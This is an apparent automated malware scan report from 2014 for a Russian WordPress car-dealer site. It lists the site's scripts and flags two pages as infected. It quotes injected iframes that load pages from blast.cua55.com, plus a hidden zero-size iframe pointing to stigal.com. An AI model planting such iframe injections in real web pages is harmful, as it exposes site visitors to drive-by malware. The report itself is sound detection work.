Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=avtovo78.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://avtovo78.ru/ | 200 OK Content-Length: 284869 Content-Type: text/html | malicious |
Page code contains blacklisted domain: blast.cua55.com <iframe src="http://blast.cua55.com/Vl3ihNMokB/vaisoe"></iframe><iframe src="http://blast.cua55.com/Vl3ihNMokB/vaisoe"></iframe><!DOCTYPE html> <!--[if lt IE 7 ]><html class="ie ie6" lang="lang="ru-RU""> <![endif]--> <!--[if IE 7 ]><html class="ie ie7" lang="lang="ru-RU""> <![endif]--> <!--[if IE 8 ]><html class="ie ie8" lang="lang="ru-RU""> <![endif]--> <!--[if (gte IE 9)|! ...[4103 bytes skipped]... Malicious iFrame found. src: http://blast.cua55.com/vl3ihnmokb/vaisoe This URL is marked by Google as suspicious <iframe src="http://blast.cua55.com/vl3ihnmokb/vaisoe"> | ||
http://avtovo78.ru/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://avtovo78.ru/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://avtovo78.ru/wp-content/plugins/vkontakte-api/js/callback.js?ver=3.8.4 | 200 OK Content-Length: 4977 Content-Type: application/javascript | clean |
http://avtovo78.ru/wp-content/themes/automotive/js/jquery.prettyPhoto.js?ver=3.8.4 | 200 OK Content-Length: 23333 Content-Type: application/javascript | clean |
http://avtovo78.ru/wp-content/themes/automotive/js/jquery.fitvids.js?ver=3.8.4 | 200 OK Content-Length: 2345 Content-Type: application/javascript | clean |
http://avtovo78.ru/wp-content/themes/automotive/js/core.js?ver=3.8.4 | 200 OK Content-Length: 2435 Content-Type: application/javascript | clean |
http://maps.google.com/maps/api/js?sensor=false&ver=3.8.4 | 200 OK Content-Length: 5052 Content-Type: text/javascript | clean |
http://google-maps-utility-library-v3.googlecode.com/svn/trunk/infobubble/src/infobubble.js?ver=3.8.4 | 200 OK Content-Length: 44434 Content-Type: text/javascript | clean |
http://avtovo78.ru/wp-content/themes/automotive/js/markerwithlabel.js?ver=3.8.4 | 200 OK Content-Length: 24891 Content-Type: application/javascript | clean |
http://avtovo78.ru/wp-content/themes/automotive/js/mapping.js?ver=3.8.4 | 200 OK Content-Length: 5297 Content-Type: application/javascript | clean |
http://avtovo78.ru/wp-content/themes/automotive/js/jquery.flexslider.min.js?ver=3.8.4 | 200 OK Content-Length: 11126 Content-Type: application/javascript | clean |
https://connect.mail.ru/js/loader.js | 200 OK Content-Length: 6448 Content-Type: application/javascript | clean |
http://avtovo78.ru/?page_id=2 | 200 OK Content-Length: 291121 Content-Type: text/html | malicious |
Suspicious code found <div style='clear:both;'><ul class='nostyle' style='float:left'>
<li> <div style='width:130px'> <a rel='nofollow' target='_blank' class='mrc__plugin_uber_like_button' href='http%3A%2F%2Favtovo78.ru%2F%3Fpage_id%3D2' data-mrc-config="{'nt' : 1, 'cm' ...[4364 bytes skipped]... Hidden iFrame found. size: 0x0 src: http://stigal.com/ <iframe src="http://stigal.com/ width="0" height="0" frameborder="0"> Malicious iFrame found. src: http://blast.cua55.com/vl3ihnmokb/vaisoe This URL is marked by Google as suspicious <iframe src="http://blast.cua55.com/vl3ihnmokb/vaisoe"> | ||
http://avtovo78.ru/wp-includes/js/comment-reply.min.js?ver=3.8.4 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: avtovo78.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Sep 2014 22:42:35 GMT
Server: nginx/1.6.0
Content-Type: text/html
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: avtovo78.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Sep 2014 22:42:35 GMT
Server: nginx/1.6.0
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: avtovo78.ru
Referer: http://www.google.com/search?q=avtovo78.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: avtovo78.ru
Referer: http://www.google.com/search?q=avtovo78.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.